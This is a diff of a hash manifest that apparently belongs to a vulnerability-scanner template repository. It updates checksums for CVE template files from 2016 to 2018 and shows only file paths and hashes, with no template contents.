-http/cves/2016/CVE-2016-1000134.yaml:ba7d4b6a95cfd8cab90d1f740b3f1c1b69238423
-http/cves/2016/CVE-2016-1000135.yaml:d199e49b000d5e1cf275596fa7ed50850a6bf059
+http/cves/2016/CVE-2016-1000129.yaml:d90c666f6e266d79b0da9bf66271461b00ab7423
+http/cves/2016/CVE-2016-1000130.yaml:58f8ae2618f832400218cf7ea11985a54437dc48
+http/cves/2016/CVE-2016-1000131.yaml:e4d747a8f2ba9295adc39d7b17bd9cfcba058d37
+http/cves/2016/CVE-2016-1000132.yaml:14d60b5e66ecd34ebf6e53e820e0158ce3dca853
+http/cves/2016/CVE-2016-1000133.yaml:da9641c2c755b1252e07bfeabe676e8a977f599e
+http/cves/2016/CVE-2016-1000134.yaml:aefd71751714be477baf00c66cee77045c006aa6
+http/cves/2016/CVE-2016-1000135.yaml:078775a697caf7bc82ca5484f117e0eec1cf5c44
 http/cves/2016/CVE-2016-1000136.yaml:54b4bae91bf6436cb49c4970d29ef835562b3a48
-http/cves/2016/CVE-2016-1000137.yaml:ea41759caa7be879d8d2897f1bfd3a030f3f7662
-http/cves/2016/CVE-2016-1000138.yaml:91b717ba612cabb2528640bf0642648159d3c51a
-http/cves/2016/CVE-2016-1000139.yaml:14f0e1ca191163b62d9fdc2ec2c12c790e8008f4
-http/cves/2016/CVE-2016-1000140.yaml:d060c3d50ac9dd9dab0907ba6f8e7ea28d4be640
-http/cves/2016/CVE-2016-1000141.yaml:a9d3079fc11753f24db238bf32a41703f549adc2
-http/cves/2016/CVE-2016-1000142.yaml:874e737c909719d9bdc36acdd9123ea87f4481b7
-http/cves/2016/CVE-2016-1000143.yaml:c48240d08439183bee09e9d5b993d326d153b594
-http/cves/2016/CVE-2016-1000146.yaml:71c36cd0cd39f99ab27fc419e09915b78db65743
-http/cves/2016/CVE-2016-1000148.yaml:51611dc1cae491f8ca5fb25a37aa22af82fc96dc
-http/cves/2016/CVE-2016-1000149.yaml:a5aeb646101838d4f28d30f23f9a133eace156b3
-http/cves/2016/CVE-2016-1000152.yaml:b29413dcb2b1729d751d30e28d654d99e5b6edef
-http/cves/2016/CVE-2016-1000153.yaml:4dc18e8e0d3bb30d37a87c2e7917c0865e750c5a
-http/cves/2016/CVE-2016-1000154.yaml:18af7500eee705e20ec02ab9bb439a948f0bf6a6
+http/cves/2016/CVE-2016-1000137.yaml:eb56ab8cccec24a4f3c30f445f7554f303bd9b49
+http/cves/2016/CVE-2016-1000138.yaml:d9a44f4f2314c948305ae6735aadbb67d7467587
+http/cves/2016/CVE-2016-1000139.yaml:b7bfa05a4baa72b1dc64662c31951d09bcb7ab7b
+http/cves/2016/CVE-2016-1000140.yaml:acdd4c0f71dc4003c4f028dec7e12a777a925b8a
+http/cves/2016/CVE-2016-1000141.yaml:47580f75e6299e210b4b586f419609afaaa8c7b6
+http/cves/2016/CVE-2016-1000142.yaml:2ca40f5a202739d2e83c2537c4f8cb65b47f0853
+http/cves/2016/CVE-2016-1000143.yaml:18bc168f0450e35b8e5c047377814340637dcb3a
+http/cves/2016/CVE-2016-1000146.yaml:7750e0b70f78b58aab9fd0d021248e1964fab091
+http/cves/2016/CVE-2016-1000148.yaml:4eb8f7a1d133d574986d317cc5009b044c5cf37b
+http/cves/2016/CVE-2016-1000149.yaml:7eee52701e6fa81f23afd3672c9f56829db6e34a
+http/cves/2016/CVE-2016-1000152.yaml:3fb1aa91e51eac2d1012861140dfea9b1a2d3ae0
+http/cves/2016/CVE-2016-1000153.yaml:a90a4448ba533f9a112aa260eb9ba2538c785ce5
+http/cves/2016/CVE-2016-1000154.yaml:43c59afddc541b80b8afe74f057e40b6cdbfaf86
 http/cves/2016/CVE-2016-1000155.yaml:7a33079b3f764d69d578df70e4ca3818ececb5a4
-http/cves/2016/CVE-2016-10033.yaml:7a8607845a49d482f2aaf6751048a092e930a43d
-http/cves/2016/CVE-2016-10108.yaml:aafd9920731d4b076833f3ab8f3d4fdc51b2030f
-http/cves/2016/CVE-2016-10134.yaml:bf5482becc0917b0c0a2fcb931f03ceac1a45247
-http/cves/2016/CVE-2016-10367.yaml:8ef8faf621df53bc4bfec5d7741eff72f005a9b3
-http/cves/2016/CVE-2016-10368.yaml:60d9b1093f486f7d867ed391b0a33a6b22c4d0f8
-http/cves/2016/CVE-2016-10924.yaml:36b26bd89e1c6245117b626779342d5af804c618
-http/cves/2016/CVE-2016-10940.yaml:16dfff87feb547a8675fd9c5afcee5505bf8a884
-http/cves/2016/CVE-2016-10956.yaml:4dd285bc1e3f23e0e70b9a2b94c0b3ffc2312fe7
-http/cves/2016/CVE-2016-10960.yaml:a40cc942bc51f33f49a8f13c9ba2f60ecb159ef6
-http/cves/2016/CVE-2016-10973.yaml:a451cc9162457a23f94216428478c5ce3cc6843d
-http/cves/2016/CVE-2016-10993.yaml:724dba1d3c443118860835c1bbcfd2a3543121c7
-http/cves/2016/CVE-2016-1555.yaml:06c5969e5f0c80f7a2cd5d62d30632c95b4fe7d8
-http/cves/2016/CVE-2016-2389.yaml:c68a89597c5a62e852c0c204e0ac6e40152a2acf
-http/cves/2016/CVE-2016-3081.yaml:0a9a62423c86d7c99e66c2413f265ac1354535a8
-http/cves/2016/CVE-2016-3088.yaml:7f2033e4db0520e2e81b34026bac5f25ebe0b40a
-http/cves/2016/CVE-2016-3978.yaml:4cc091512c690a5d6d64df4cb71652b31b908189
-http/cves/2016/CVE-2016-4437.yaml:b43d38eb16801112e495f3be28fea1ae5eb32055
-http/cves/2016/CVE-2016-4975.yaml:0acce1defd21201bb0224fdd670cbeb8af496020
-http/cves/2016/CVE-2016-4977.yaml:a6bd0312d86229a360ef6bb035d93705d8211bf7
-http/cves/2016/CVE-2016-5649.yaml:272868fda58588b9bb6adcce742be25a74cbbde2
-http/cves/2016/CVE-2016-6195.yaml:ae447f15c32c4da2d90306e5829bef9b45b3a29e
-http/cves/2016/CVE-2016-6277.yaml:18eb8abe4b6646f2a2d4d7056a46c37c0e3ad317
-http/cves/2016/CVE-2016-6601.yaml:1277fe405e0eb76292534f8b829906210fe48e59
-http/cves/2016/CVE-2016-7552.yaml:505a60e56a701c178630830196619665596ff654
-http/cves/2016/CVE-2016-7834.yaml:23f54f33feb2fbb42f74ed4f972011c1a1399be0
-http/cves/2016/CVE-2016-7981.yaml:61700648f6bf5f08c00a745fcaa57805a1218572
-http/cves/2016/CVE-2016-8527.yaml:951564ba4670328f0d30403f24e9e0a05c673651
-http/cves/2017/CVE-2017-0929.yaml:4443e5cd124a1780a506b29c736d92ed3b8d661e
+http/cves/2016/CVE-2016-10033.yaml:ce389a81d193ae5606f09f85bae326743f720e3c
+http/cves/2016/CVE-2016-10108.yaml:8e05b3f45b4ff23978e6c828ee42b1345cfb3789
+http/cves/2016/CVE-2016-10134.yaml:2fb772084500884a2945902a5b45f4acf12a1469
+http/cves/2016/CVE-2016-10367.yaml:52390032ca7ba46d211d738d7bdbbe8a44704b14
+http/cves/2016/CVE-2016-10368.yaml:026b2081b1e58241ed8e24c4770593be88f98300
+http/cves/2016/CVE-2016-10924.yaml:f03090931175a313574b1fdf30281872dcea36db
+http/cves/2016/CVE-2016-10940.yaml:1e64fa8c00765b5d56dd9dc1108b0ce0c55882b6
+http/cves/2016/CVE-2016-10956.yaml:b7e533a71e3b87c50943a1e3adfb7b3204ebc78e
+http/cves/2016/CVE-2016-10960.yaml:956604e8da462ea3d351c0d1b80fcf47d4378453
+http/cves/2016/CVE-2016-10973.yaml:d42e8746c96695687320b25c4f7c779d95219eae
+http/cves/2016/CVE-2016-10993.yaml:17dbbe3f7dba8f86100124da83f97e0e69fc6fdf
+http/cves/2016/CVE-2016-1555.yaml:90060af765793870bda5512a3a8def693ded296b
+http/cves/2016/CVE-2016-2389.yaml:f367159a1bf528fe830583f445d7904ea1f755b4
+http/cves/2016/CVE-2016-3081.yaml:d133f7c9af4835ecdd688e05f1ef1946a0088be5
+http/cves/2016/CVE-2016-3088.yaml:b7399b26d3280601caead3164f24b2fc71f023f8
+http/cves/2016/CVE-2016-3978.yaml:5295d51cf77946c3001485d451f6de6b5497511f
+http/cves/2016/CVE-2016-4437.yaml:bfca753826c3be353a5b1087b4320168d93ed46d
+http/cves/2016/CVE-2016-4975.yaml:d270f01af10eccb0125ee30fad7d4d5f7e8e56fc
+http/cves/2016/CVE-2016-4977.yaml:fc2b081c457f89a4628c5d3d40880aa4ee9d45be
+http/cves/2016/CVE-2016-5649.yaml:826dfaac1a87bd88f97e6679a1e811b576589766
+http/cves/2016/CVE-2016-6195.yaml:c7a579387429eb9598d38773c72286331cd78afa
+http/cves/2016/CVE-2016-6277.yaml:50532a32961200b9c633f12dc665c4b1ee0fd3a5
+http/cves/2016/CVE-2016-6601.yaml:c67636f6ae2eea5fad655db8a0a7663c4a6bc87f
+http/cves/2016/CVE-2016-7552.yaml:60b3a588a85f786ec494b79874deb22e1372e1e9
+http/cves/2016/CVE-2016-7834.yaml:fc9c0000623a298c19f9578b0e9bfc9eadec94db
+http/cves/2016/CVE-2016-7981.yaml:f42c4671f7471274f6eca1f56464f186c79fce65
+http/cves/2016/CVE-2016-8527.yaml:7b31778c21b4f73753a070729238762ebfe4f450
+http/cves/2017/CVE-2017-0929.yaml:16e7ee0d0272d2ef01af074639dadab7404f0df5
 http/cves/2017/CVE-2017-1000028.yaml:addf4de111ca65284519feeba0cd08a777a88cca
-http/cves/2017/CVE-2017-1000029.yaml:f181ad91f0fc46f1d456a970b07e0cd492f57104
-http/cves/2017/CVE-2017-1000163.yaml:a7fbddfab1b8756916c5d50bf3771a3515097128
-http/cves/2017/CVE-2017-1000170.yaml:eb52aba5279540344944903f7c94ad230b302115
-http/cves/2017/CVE-2017-1000486.yaml:1dbb6067f0f21943451db2933a64e9d63e23e9d5
-http/cves/2017/CVE-2017-10075.yaml:29577d1fe5c2cc602f3166d606e96a3ad3fcabb0
-http/cves/2017/CVE-2017-10271.yaml:8ad32b30441ed25a507c48a8ceb3191118da20d3
-http/cves/2017/CVE-2017-10974.yaml:c6ecc3648b5d0e40a8f0f0c336c2c7df272092c5
-http/cves/2017/CVE-2017-11165.yaml:579e706985765c0cce881e3306b501376016f30b
-http/cves/2017/CVE-2017-11444.yaml:e03d55acc6fa4fd4bdf7bc35a5e9a1e703ce34a4
-http/cves/2017/CVE-2017-11512.yaml:dfad53789ce2d3ae77d0b339d3b7d186626bb3f8
-http/cves/2017/CVE-2017-11586.yaml:19d2921ff128012b476a23513f62e64621a79084
-http/cves/2017/CVE-2017-11610.yaml:409b59abd4bf17debb9d7532a5f83fa212fe729a
-http/cves/2017/CVE-2017-11629.yaml:19c6f3b070354b60d72ba862291cd8baa1bec5c9
-http/cves/2017/CVE-2017-12138.yaml:cd16d7ac8bc4486a796121fe0fb4c82693f7e9f0
-http/cves/2017/CVE-2017-12149.yaml:0316211048b1d87787c5a453c4917062c00fc7bf
-http/cves/2017/CVE-2017-12542.yaml:bce1c2a752ce8e8137d970cd3e3367db730c206a
-http/cves/2017/CVE-2017-12544.yaml:1556906da161f7eb561cf6414a021c081b6d8f32
-http/cves/2017/CVE-2017-12583.yaml:fcdae6ac79037f3beda3034397d1a695eb4ef0ec
-http/cves/2017/CVE-2017-12611.yaml:3c735340057fe6db7d6e34a7c8a2fc87cfbd9ed7
-http/cves/2017/CVE-2017-12615.yaml:06fe8c965e408e13ec46c853e59178f3d2b5f131
-http/cves/2017/CVE-2017-12617.yaml:b612de166a36e56bca0f8682cb6de1ad71970751
-http/cves/2017/CVE-2017-12629.yaml:027c692c8155e627e448a037fef4ef968785d847
-http/cves/2017/CVE-2017-12635.yaml:3d050bbef3d650dea5c3b96a0e786d3480b238c2
-http/cves/2017/CVE-2017-12637.yaml:907399d2c9f8766df44cc38656c27014a3f21361
-http/cves/2017/CVE-2017-12794.yaml:1f25ebfe965385158be2289e1967368caddf985e
-http/cves/2017/CVE-2017-14135.yaml:c3143a2ba72734d2d3e81347430f09de23aca36d
-http/cves/2017/CVE-2017-14186.yaml:6d3029db0b6a29728ae27ef7d82e9a32e0247a5a
-http/cves/2017/CVE-2017-14524.yaml:454d1d4ce17f7800043444b8035813e400b3ce1f
-http/cves/2017/CVE-2017-14535.yaml:9dd0b87dab2eb610e3c21bb3c204df187fc49517
-http/cves/2017/CVE-2017-14537.yaml:deb59e7cb84dc9e3e8bf346c832136825c9088bc
-http/cves/2017/CVE-2017-14622.yaml:9799e91203ab56f8c21b340976d899757a4e4fb3
-http/cves/2017/CVE-2017-14651.yaml:48d9a1879c293812b964bb4216dfab117612fafc
-http/cves/2017/CVE-2017-14849.yaml:96a64d41c0fceb37fc7906579f1b66526c0a626a
-http/cves/2017/CVE-2017-15287.yaml:cfffc5cb693c7a13b021452d7a09abc360a396f6
-http/cves/2017/CVE-2017-15363.yaml:893bfbf55846cb69c1478668c46fb5cfa78e77e3
-http/cves/2017/CVE-2017-15647.yaml:73f71605976ecec97cbf70357821ac8fd035f314
-http/cves/2017/CVE-2017-15715.yaml:34f7181753705aacb9a0ba948c8dd67eaa1f5da2
-http/cves/2017/CVE-2017-15944.yaml:593a85a3a001629052ed0e833308856d7ce49a95
-http/cves/2017/CVE-2017-16806.yaml:46f6af6823b9732e764780589fb45f1d0048e16e
-http/cves/2017/CVE-2017-16877.yaml:f4bc280452dd32225bc4cfe4f7622f0f00ca5b4c
-http/cves/2017/CVE-2017-16894.yaml:e6f693e38067273784ef15b122162d79ff78c75f
-http/cves/2017/CVE-2017-17043.yaml:7e9872dd3d5e4327a71de2d0f48425caee010748
-http/cves/2017/CVE-2017-17059.yaml:95b46d2fcd8bd0a46e4f789febe5f81a6dca220d
-http/cves/2017/CVE-2017-17451.yaml:89ac93a822168336a7a433efb80a6812ed8415e6
-http/cves/2017/CVE-2017-17562.yaml:b77e86f3029b3ab23d441a7b3b0637047d989087
-http/cves/2017/CVE-2017-17731.yaml:34c04446d7a434b650cf4f0c4900d6338bc13ee3
-http/cves/2017/CVE-2017-17736.yaml:ac1711479f92f259c22179846a1c1de182d6fc7a
-http/cves/2017/CVE-2017-18024.yaml:aa83001665c91c0fea5cc5125198af474bb7029d
+http/cves/2017/CVE-2017-1000029.yaml:e022b4774e2b0c7c0d4f793c7a786569f0bf2b66
+http/cves/2017/CVE-2017-1000163.yaml:6f5ce549a4ff1dd2ddf99b2aab9fd1fbe5beb8d1
+http/cves/2017/CVE-2017-1000170.yaml:2bc3aa517030eaec2083844d61fd5896021ad745
+http/cves/2017/CVE-2017-1000486.yaml:bd6f50c93df7c731576a446bbe1122837829829d
+http/cves/2017/CVE-2017-10075.yaml:b7e02797203edafec35cc3693465ef912f3f97ef
+http/cves/2017/CVE-2017-10271.yaml:34ae073c068af54b5a36058ab4b33b2cb26f81c3
+http/cves/2017/CVE-2017-10974.yaml:ca4dc42ec03c7f7c66b8c4d60e78dbdde0a44fce
+http/cves/2017/CVE-2017-11165.yaml:90c54a0f297c4a2fb3adab12ed0e28eb5a1f92d3
+http/cves/2017/CVE-2017-11444.yaml:b1f8928100d2bc5feaf46dc2b2c3357c93f00efe
+http/cves/2017/CVE-2017-11512.yaml:9427313cd620eec43c9a1189d1e4632b4369a663
+http/cves/2017/CVE-2017-11586.yaml:90eb78983757473424d56564157cb16abd039190
+http/cves/2017/CVE-2017-11610.yaml:c3b11ddd3a65d122ecff0570d1eb7f1b993f558c
+http/cves/2017/CVE-2017-11629.yaml:8789ac3137929552b1bc172c0a1810705addb918
+http/cves/2017/CVE-2017-12138.yaml:b117857513b1a8a105fa82a6f7e92ac72c75ea7a
+http/cves/2017/CVE-2017-12149.yaml:7e93b96b9c9f6044ff50cc3d0d1bc5a16d420fd7
+http/cves/2017/CVE-2017-12542.yaml:521243c6133c562495efc5495230d13081915afe
+http/cves/2017/CVE-2017-12544.yaml:6c99779fb8dcadd52ab60f73ccb6bfe310c6aa1e
+http/cves/2017/CVE-2017-12583.yaml:133d14ad9275795f59885083278d724da5706ead
+http/cves/2017/CVE-2017-12611.yaml:b44f1901610fa7b3f56d9c5e5e9156ba9d95c796
+http/cves/2017/CVE-2017-12615.yaml:1332d54ec2ef3ba1f2291d10f6539e39029e9577
+http/cves/2017/CVE-2017-12617.yaml:4d340a752fd7fdd0ef5921fed89bb60f7862e9c2
+http/cves/2017/CVE-2017-12629.yaml:2e1e0070e8f9c9975074dab417e3d372a4ae129f
+http/cves/2017/CVE-2017-12635.yaml:3f9686e7f11bab3f90dbdeeaec50807fefca3abf
+http/cves/2017/CVE-2017-12637.yaml:cd9f2e3bdf4267d094d35b4635cbed2c56d7e931
+http/cves/2017/CVE-2017-12794.yaml:933238a17426e60810dad692721329ae8abfbc64
+http/cves/2017/CVE-2017-14135.yaml:6092ffcd022c2d0d5cfcced451720551ba16e16d
+http/cves/2017/CVE-2017-14186.yaml:1c030cfb21477c4a9242e4c0f399fd5dba3a9f29
+http/cves/2017/CVE-2017-14524.yaml:824f850ca133d084d25d4c5062a46f29e4e19ea2
+http/cves/2017/CVE-2017-14535.yaml:0e6677e4e25a8ede3953463e279cd29b93b88d18
+http/cves/2017/CVE-2017-14537.yaml:46d453360ab26dadb8341a783b1a95f22e22c2c7
+http/cves/2017/CVE-2017-14622.yaml:16bef73f45d813365fb6be8872548f93c2894fc2
+http/cves/2017/CVE-2017-14651.yaml:47d07ae099cb9a9c4d16a5d52ac68605bbe35baa
+http/cves/2017/CVE-2017-14849.yaml:5612bf559b38e4de5d868f91387dd3166fc0a4f7
+http/cves/2017/CVE-2017-15287.yaml:7a439e70a368485ab3215511c29cc69e5262cf52
+http/cves/2017/CVE-2017-15363.yaml:42605d1a13d93a676a78c85ab8120b63441b27aa
+http/cves/2017/CVE-2017-15647.yaml:c0dda374975ec19276b75ea665910ba3d4407d47
+http/cves/2017/CVE-2017-15715.yaml:135efc926e9b5f3716c0e725559568ce41361544
+http/cves/2017/CVE-2017-15944.yaml:eb9694b6d32e7f99664c6d6b28f715a89987d8a5
+http/cves/2017/CVE-2017-16806.yaml:90584af1d01d5616cd9618c6047a8e0769eae041
+http/cves/2017/CVE-2017-16877.yaml:addce598ad69a0d4008f784be6e7bd8113b5b201
+http/cves/2017/CVE-2017-16894.yaml:aaabdfbb2745a4d999a076e77029ec3c761f04d1
+http/cves/2017/CVE-2017-17043.yaml:080876e2e09601e1954808b7d285a5232065aac0
+http/cves/2017/CVE-2017-17059.yaml:99c16a07bc096eb125d2427ff1eb067bf51a968c
+http/cves/2017/CVE-2017-17451.yaml:889a4a102c4b858c02c356364f33794cd3aa0073
+http/cves/2017/CVE-2017-17562.yaml:38f9bdfd5be24b216e3e0b2054f909824c69b774
+http/cves/2017/CVE-2017-17731.yaml:f25ec6cb1204e6b5de43646d2fd84809b0cc61e2
+http/cves/2017/CVE-2017-17736.yaml:2d6f119a1a86243ed5e9e164425f8de8fb854034
+http/cves/2017/CVE-2017-18024.yaml:bc4cf14eff98b256da35e7d174c800540ca29380
 http/cves/2017/CVE-2017-18487.yaml:d5c0aa22d568420adad65fa392e08502fffabd92
 http/cves/2017/CVE-2017-18490.yaml:0221914fc2ffec5831ebe094f916df822a89cf11
 http/cves/2017/CVE-2017-18491.yaml:3663189b01ffb0919a26a597af6328db337327d2
@@ -1098,7 +1108,7 @@ http/cves/2017/CVE-2017-18528.yaml:2b89079dfbf2eb428aa077f713eeff8e64360c85
 http/cves/2017/CVE-2017-18529.yaml:4c4cea7e1166de29d284b7e195491f5f1173a6b4
 http/cves/2017/CVE-2017-18530.yaml:b1da3d833a670a1176a74fd8716e9112368f42fc
 http/cves/2017/CVE-2017-18532.yaml:0a0a7d7520bb34a6bdbe6a452e8915d6d9f16a5e
-http/cves/2017/CVE-2017-18536.yaml:79d30a8a9dcb6076065f914bc9b0829d02997da4
+http/cves/2017/CVE-2017-18536.yaml:2c498e0c59f3e3d23e5b5341880778e8d1481f80
 http/cves/2017/CVE-2017-18537.yaml:5bffb4d2e90a96ec9e4e91431ba71332615e3673
 http/cves/2017/CVE-2017-18542.yaml:0050f03f9faa1d89487c9cea261352b94a2cf3a8
 http/cves/2017/CVE-2017-18556.yaml:08def75decdaf3dc219fa97c9f3f3d47427f22f0
@@ -1108,1721 +1118,1721 @@ http/cves/2017/CVE-2017-18562.yaml:6014d4fbd556e07de43c172dc06f9c1bd4f30c72
 http/cves/2017/CVE-2017-18564.yaml:bd679da1043bb5050f5677967c8e3db902da5abd
 http/cves/2017/CVE-2017-18565.yaml:4f158d19f0491ee33a5c35624ef72dd816928fd4
 http/cves/2017/CVE-2017-18566.yaml:b215201dce89fcb15e006f76f8278817f649f50f
-http/cves/2017/CVE-2017-18598.yaml:a2fe11d033affaafe71a7090db12037978067629
-http/cves/2017/CVE-2017-18638.yaml:8079367d9ba83c3a499e224c3581d7293b8778d1
-http/cves/2017/CVE-2017-3506.yaml:6e22b617dfcd5ead6560e23c238a8a3af039c079
+http/cves/2017/CVE-2017-18598.yaml:68b5cc0afb4d260b3164638ee7181ebede8e2507
+http/cves/2017/CVE-2017-18638.yaml:ae5d0872287fb7ec58754fa14830f0d2803d92f3
+http/cves/2017/CVE-2017-3506.yaml:9d3599b94152fc9b8a1ffaf810264bf772738764
 http/cves/2017/CVE-2017-3528.yaml:fd44a46c473aa25189e4931866077623ab805d27
-http/cves/2017/CVE-2017-4011.yaml:2c3e231151d8bb91caf5f6e33b005bc8ff1bac6e
-http/cves/2017/CVE-2017-5487.yaml:eb7c6e72515314e0137b26b8abaa218195f218c3
-http/cves/2017/CVE-2017-5521.yaml:c80b86064426be913f01d632a8fb5a7897d01ce3
-http/cves/2017/CVE-2017-5631.yaml:356e450603f6308a6808e089e29c176d48b285a9
-http/cves/2017/CVE-2017-5638.yaml:157d4893ff361cf0bfe706371b7b896df88dfb5b
-http/cves/2017/CVE-2017-5689.yaml:d8a2123b2b5604ddd14a3faefa89152ff52a7a6d
+http/cves/2017/CVE-2017-4011.yaml:c2055a0b4455bdbcaa8c6a0965b08cd82694ac70
+http/cves/2017/CVE-2017-5487.yaml:605ec4b4ddc32eee7baa5ed9319b7ef5ffd98252
+http/cves/2017/CVE-2017-5521.yaml:18d74e9795ab5d67a40cc30f0a008f94b6ea117a
+http/cves/2017/CVE-2017-5631.yaml:3103eb8b159934bc676c96f4af86c083732dc810
+http/cves/2017/CVE-2017-5638.yaml:b6dfe6408013f6f734706021d177afb3a0e7afa1
+http/cves/2017/CVE-2017-5689.yaml:8fb11dc5e6b7650ed033c8840ac22a9965a26114
 http/cves/2017/CVE-2017-5982.yaml:596cdae3d6abba62e2dd8c2dfe10114c0ce56ad9
-http/cves/2017/CVE-2017-6090.yaml:c2c1cd14c382d74e3b952a90d838d12b899c5f01
-http/cves/2017/CVE-2017-7269.yaml:4151069d796c910bdef6de309dc2ee2b4a2383ce
-http/cves/2017/CVE-2017-7391.yaml:ef3a13ad1986d42c3b3a8df29d339352580c004f
-http/cves/2017/CVE-2017-7615.yaml:64143a54fd2d446e80295a93178f453a17faaf58
+http/cves/2017/CVE-2017-6090.yaml:45a0f06649e86cd28710f7a79b9512c7642fefb0
+http/cves/2017/CVE-2017-7269.yaml:21016251e3fe09f17745c4920b2ca37aa383ce07
+http/cves/2017/CVE-2017-7391.yaml:b227f18479bdb0b320beb1fc4bbedcbdc8bce64b
+http/cves/2017/CVE-2017-7615.yaml:edf884839d607c5187bddbf26aca5f83042a64f6
 http/cves/2017/CVE-2017-7855.yaml:921a27e99bdf90e82ba762ea67e03013bd680fd9
-http/cves/2017/CVE-2017-7921.yaml:927c7cc3c7f6fca768eb24ca72f15f29787801f7
-http/cves/2017/CVE-2017-7925.yaml:a830f1df2d3e341a27653f714a51c6a1f20897f8
-http/cves/2017/CVE-2017-8229.yaml:d93bc6328610c0731c35ca0535065056898abf11
-http/cves/2017/CVE-2017-8917.yaml:4128dc69d3bca57f4182687d89a8628a5597bac0
-http/cves/2017/CVE-2017-9140.yaml:2bfcbc1ba411eed191ca4450fa18bf907709633b
-http/cves/2017/CVE-2017-9288.yaml:be3d6cebe711a8a1218832e1669caa3890cbe81e
-http/cves/2017/CVE-2017-9416.yaml:a54fdbbffc638584cb9794674b2a50a565e2fc1f
-http/cves/2017/CVE-2017-9506.yaml:afb5f8f23bfbc22b46e88571efc8616b37381251
-http/cves/2017/CVE-2017-9791.yaml:25904df6207972f016adbc3cf6a454d00456a65d
-http/cves/2017/CVE-2017-9805.yaml:7db54e3e82f2fb6aa1adb28ddc1c94193e5207a1
-http/cves/2017/CVE-2017-9822.yaml:b1c71ef8ef5f11510243e0c6e83d3ebcef68baee
-http/cves/2017/CVE-2017-9833.yaml:68fdee2fc57cdb0bd684ad71840db08db9be58c0
+http/cves/2017/CVE-2017-7921.yaml:f4b6e6e18d4e5310d71a4b2cff5f528c3a272ceb
+http/cves/2017/CVE-2017-7925.yaml:1f16557d4b714ea699c07b2fae69543d0ba90288
+http/cves/2017/CVE-2017-8229.yaml:2175f405c52808e4885c3e4baeeabea9cf695cf2
+http/cves/2017/CVE-2017-8917.yaml:26524c88e6d8f020e290de981c9b6eb6d167f447
+http/cves/2017/CVE-2017-9140.yaml:f38ba17fe17ef8abd880114ca499d6848e5d48f8
+http/cves/2017/CVE-2017-9288.yaml:370ac7fc45be6f1061b19342793553837edaa558
+http/cves/2017/CVE-2017-9416.yaml:72e6324978dad59f214b7096b943be4e3bbcb39f
+http/cves/2017/CVE-2017-9506.yaml:a24cfd5392d72d75bf3f85f83afe139cc4d952f8
+http/cves/2017/CVE-2017-9791.yaml:425fc309026a0b2a1ceb8afcd85c9537a3a474f6
+http/cves/2017/CVE-2017-9805.yaml:360a3febbe55d3986b51f8ede5fa1e8adc7c6229
+http/cves/2017/CVE-2017-9822.yaml:784cdb2db7a761784de85d86c2417e9129ba484f
+http/cves/2017/CVE-2017-9833.yaml:7b1f6312a66eb7dcbac8d646279a61bc6dd78765
 http/cves/2017/CVE-2017-9841.yaml:6b8ba0aed99138add659d619aff7f089bb6ea4a4
-http/cves/2018/CVE-2018-0127.yaml:7e36b8794df36b049cc365adee56b0e749ab80b2
-http/cves/2018/CVE-2018-0296.yaml:2adeaea511a358f1f68b8f8c256552fcd0a8544e
-http/cves/2018/CVE-2018-1000129.yaml:1750f6368e88731db793966e0f56e92ed689dbb9
-http/cves/2018/CVE-2018-1000130.yaml:4226249c7291cd11043feb4157545e811b213232
+http/cves/2018/CVE-2018-0127.yaml:62e796b970d653fa701bf1e66bd11a54afa8567c
+http/cves/2018/CVE-2018-0296.yaml:4575b71c06d951d36065ed94d6e9dd601f9799d8
+http/cves/2018/CVE-2018-1000129.yaml:2db06e2d02aadfb418f75869b27558066bde0547
+http/cves/2018/CVE-2018-1000130.yaml:7b47c2ea352df9bcee48e37797a5701a39a8d23b
 http/cves/2018/CVE-2018-1000226.yaml:b6d11f2f913ecebc7473632c7df8b83c226b09fb
-http/cves/2018/CVE-2018-1000533.yaml:15993b638ff6c76cd88ac2cccd7d7ab1bd50feda
-http/cves/2018/CVE-2018-1000600.yaml:e35bedf978f4f0de81903def353d04e7a467b365
-http/cves/2018/CVE-2018-1000671.yaml:f570d60929e385cb4ad3744294bb23786eb925b1
-http/cves/2018/CVE-2018-1000856.yaml:bce9d8745be1fd5e6720f24653360fad4c6fa64d
-http/cves/2018/CVE-2018-1000861.yaml:a8cdb3e24ce64b3b604f22d656c23168fb3fdfce
-http/cves/2018/CVE-2018-10093.yaml:80964bccf9a82dc3cee46b577ee0eea098d5780b
-http/cves/2018/CVE-2018-10095.yaml:a141be901290903c4870570386c58a10ce504ece
-http/cves/2018/CVE-2018-10141.yaml:7f3665767048c68582343c0bdbb4db2b8afdf589
-http/cves/2018/CVE-2018-10201.yaml:7d48865901431b0f315c55e0cb978dc679f438af
-http/cves/2018/CVE-2018-10230.yaml:8199cf8a1e38ce21a84e850871404182a088a025
-http/cves/2018/CVE-2018-10562.yaml:be49ba97bfb9a8db408bca78f58670872383ddef
-http/cves/2018/CVE-2018-10818.yaml:b49c64b809d9fd733e63d53d7de657856dc1217f
-http/cves/2018/CVE-2018-10822.yaml:16a9573e20689bff1086841942d1f3f4d7180ec7
-http/cves/2018/CVE-2018-10823.yaml:ce92d5be64bdc2ac4e451430dac2a59564810f51
-http/cves/2018/CVE-2018-10956.yaml:db3ffd0f641be169a886ad6c351ff6f4dc5c5e5d
-http/cves/2018/CVE-2018-11227.yaml:0a443e7f0e3c6c3a39e47c91a99e9567df03660a
-http/cves/2018/CVE-2018-11231.yaml:0987e1cb56f2dbd5404c6ec401294ca44a85050d
-http/cves/2018/CVE-2018-11409.yaml:2e2848752c0c1bae4b8f38ef146a0905ce0f9f11
-http/cves/2018/CVE-2018-11473.yaml:846415e267a038988366f0c9d28e8788a206bee9
-http/cves/2018/CVE-2018-11709.yaml:bd9892770b73ec735b4f81d0a59d4d58017f3bf6
-http/cves/2018/CVE-2018-11759.yaml:d13c6416726d54cf057e0fbf6ec65dac379a5387
-http/cves/2018/CVE-2018-11776.yaml:590d660c46c8d05a1fb9be5766c56a31f4429262
-http/cves/2018/CVE-2018-11784.yaml:160c6cc7bbf15b2e856ff93f1ac64b7603a351c5
-http/cves/2018/CVE-2018-12031.yaml:bf5ea6687d39c0db6878da203fb5fd404f75d002
-http/cves/2018/CVE-2018-12054.yaml:140b45e57a85c07252712eb7749d3b1de7bce31a
-http/cves/2018/CVE-2018-1207.yaml:843c00950c005e8c5f2405b311db2b9a0e1e4717
-http/cves/2018/CVE-2018-12095.yaml:b89999106069627a54684aa34dddd053c7c9adfb
-http/cves/2018/CVE-2018-12296.yaml:2876c627b42933e2acc67c45dcd2bf3e787c3400
-http/cves/2018/CVE-2018-12300.yaml:0dcf66cddef6153589d78382f4cf1590a33d8bca
